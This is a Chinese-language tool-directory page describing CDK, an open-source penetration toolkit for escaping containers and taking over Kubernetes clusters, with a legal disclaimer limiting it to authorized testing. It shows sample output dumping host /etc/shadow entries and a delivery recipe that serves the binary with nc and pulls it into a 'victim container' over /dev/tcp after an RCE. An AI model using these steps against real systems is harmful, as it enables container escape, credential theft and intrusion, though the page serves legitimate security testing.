Skip to content
KitploitKITPLOIT
工具漏洞利用博客
Log in
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CDK — 📦 使K8s、Docker和Containerd的安全测试更容易。 | Kitploit
工具/GitHubGitHub/cdk-team/cdk
权限提升侦察容器安全持久化机制漏洞利用横向移动后渗透利用渗透测试云安全容器逃逸容器逃逸 分类第 2 名
4.7k606655个月前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
GitHubcdk-team/cdk

CDK

📦 使K8s、Docker和Containerd的安全测试更容易。

查看仓库网站

CDK - 零依赖容器渗透工具包

英文 | 简体中文

png

法律免责声明

未经事先双方同意,使用CDK攻击目标是违法的。CDK仅用于安全测试目的。

概述

CDK是一个开源的容器渗透工具包,旨在无需任何操作系统依赖的情况下,在不同的精简容器中提供稳定的利用。它附带了有用的网络工具和许多强大的PoC/EXP,帮助您轻松逃离容器并接管K8s集群。

快速开始

运行 cdk eva 获取评估信息和推荐的利用方式,然后运行 cdk run 开始攻击。

> ./cdk eva --full

[*] Maybe you can exploit the *Capabilities* below:
[!] CAP_DAC_READ_SEARCH enabled. You can read files from host. Use 'cdk run cap-dac-read-search' ... for exploitation.
[!] CAP_SYS_MODULE enabled. You can escape the container via loading kernel module. More info at https://xcellerator.github.io/posts/docker_escape/.
Critical - SYS_ADMIN Capability Found. Try 'cdk run rewrite-cgroup-devices/mount-cgroup/...'.
Critical - Possible Privileged Container Found.

> ./cdk run cap-dac-read-search

Running with target: /etc/shadow, ref: /etc/hostname
ubuntu:$6$*******:19173:0:99999:7:::
root:*:18659:0:99999:7:::
daemon:*:18659:0:99999:7:::
bin:*:18659:0:99999:7:::

安装/投递

从 https://github.com/cdk-team/CDK/releases/ 下载最新版本发布。

将可执行文件放入目标容器并开始测试。

提示:在实际渗透测试中将CDK投递到目标容器

如果你有一个可以上传文件的利用,那么你可以直接上传CDK二进制文件。

如果你有一个RCE利用,但目标容器没有curl或wget,你可以使用以下方法投递CDK:

  1. 首先,在你的具有公网IP的主机上托管CDK二进制文件。
(在你的主机上)
nc -lvp 999 < cdk
  1. 在受害容器内执行
cat < /dev/tcp/(你的公网主机IP)/(端口) > cdk
chmod a+x cdk

用法

Usage:
  cdk evaluate [--full]
  cdk run (--list | <exploit> [<args>...])
  cdk <tool> [<args>...]

Evaluate:
  cdk evaluate                              Gather information to find weakness inside container.
  cdk evaluate --full                       Enable file scan during information gathering.

Exploit:
  cdk run --list                            List all available exploits.
  cdk run <exploit> [<args>...]             Run single exploit, docs in https://github.com/cdk-team/CDK/wiki

Tool:
  vi <file>                                 Edit files in container like "vi" command.
  ps                                        Show process information like "ps -ef" command.
  nc [options]                              Create TCP tunnel.
  ifconfig                                  Show network information.
  kcurl <path> (get|post) <uri> <data>      Make request to K8s api-server.
  ectl <endpoint> get <key>                 Unauthorized enumeration of ectd keys.
  ucurl (get|post) <socket> <uri> <data>    Make request to docker unix socket.
  probe <ip> <port> <parallel> <timeout-ms> TCP port scan, example: cdk probe 10.0.1.0-255 80,8080-9443 50 1000

Options:
  -h --help     Show this help msg.
  -v --version  Show version.
  --profile=<name> Select evaluation profile.

功能

CDK有三个模块:

  1. 评估:收集容器内信息以发现潜在弱点。
  2. 利用:用于容器逃逸、持久化和横向移动。
  3. 工具:用于TCP/HTTP请求、隧道和K8s集群管理的网络工具和API。

评估模块

用法

cdk evaluate [--full]
战术脚本支持用法/示例
信息收集OS基本信息✔链接
信息收集可用能力(Capabilities)✔链接
信息收集可用Linux命令✔链接
信息收集挂载点✔链接
信息收集网络命名空间✔链接
信息收集敏感环境变量✔链接
信息收集敏感进程✔链接
信息收集敏感本地文件✔链接
信息收集Kube-proxy 路由本地网络(CVE-2020-8558)✔链接
信息收集基于DNS的服务发现✔链接
发现K8s Api-server信息✔链接
发现K8s Service-account信息✔链接
发现云提供商元数据API✔链接

利用模块

列出所有可用的利用:

cdk run --list

运行目标利用:

cdk run <script-name> [options]
下载工具